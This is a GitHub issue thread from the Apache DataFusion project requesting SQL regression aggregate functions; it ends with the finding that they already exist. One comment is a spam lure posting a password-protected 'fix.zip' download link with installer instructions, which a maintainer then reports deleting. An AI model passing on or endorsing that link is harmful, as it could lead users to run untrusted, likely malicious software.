### ISSUE TITLE
[Epic] Support for Regression Functions

### ISSUE THREAD

**Issue by Weijun-H** [apache/datafusion#12234]
### Is your feature request related to a problem or challenge?

We need to implement a set of regression functions to support statistical analysis in our data processing workflows. These functions will enable users to perform regression analysis directly within their queries.

### Describe the solution you'd like

Functions to be Supported:
- [ ] `regr_avgx(y, x)`
- [ ] `regr_avgy(y, x)`
- [ ] `regr_count(y, x)`
- [ ] `regr_intercept(y, x)`
- [ ] `regr_r2(y, x)`
- [ ] `regr_slope(y, x)`
- [ ] `regr_sxx(y, x)`
- [ ] `regr_sxy(y, x)`
- [ ] `regr_syy(y, x)`

### Additional context

https://duckdb.org/docs/sql/functions/aggregates#statistical-aggregates
https://www.postgresql.org/docs/9.1/functions-aggregate.html

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jonahgao** [comment]
Deleted a spam comment:
<img src="https://github.com/user-attachments/assets/d1acbbce-da5b-42f9-95ac-340856c05008" width="400"  />

**Comment by tlm365** [comment]
Looks like all of their functions have been implemented already, docs [here](https://datafusion.apache.org/user-guide/sql/aggregate_functions.html#statistical).

**Comment by Weijun-H** [comment]
implemented already
